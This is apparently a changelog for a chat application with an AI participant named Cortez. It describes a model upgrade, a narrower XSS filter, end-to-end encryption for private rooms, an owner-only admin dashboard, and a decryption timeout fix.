Model and Token Upgrades
The AI model was switched from google/gemini-2.0-flash-001 to google/gemini-2.5-flash, and max_tokens was raised to 32,768 — enabling much longer, more detailed AI responses. The conversation context window was expanded to 40 messages.
XSS Filter Fix
The existing XSS filter was too aggressive — it was blocking legitimate code pastes (multi-line strings, angle brackets in type annotations). The filter was tightened to only reject actual script injection patterns, not general code.
End-to-End Encryption (E2EE) for Private Rooms
Each private room can now be initialized with a shared AES-GCM key. The room key is generated client-side using the Web Crypto API, wrapped with each member's RSA-OAEP public key, and stored server-side per-user. Messages in E2EE rooms are encrypted before being sent over the wire. The server stores and relays ciphertext — it never sees plaintext.
- A "Leave Room" button was added alongside this to cleanly remove the local key material and socket subscription.
- The frontend persists the key in session storage so it survives refreshes within the same session.
- A lock-icon indicator in
RoomSidebarshows E2EE status at a glance.
Admin Dashboard
/admin (protected route, owner-only) lists all users with their subscription tier, token usage, and account metadata. An upgrade button calls the existing admin endpoint to change a user's tier without touching the database directly.
Cortez E2EE Timeout Fix
Cortez (the AI participant) was returning empty replies due to a 504 timeout when decrypting large E2EE messages. The decryption path was made more defensive and the timeout extended.
Why it matters
E2EE is a meaningful trust differentiator — users can have genuinely private conversations that the platform operator cannot read. The admin dashboard made early-access user management tractable without SSH access.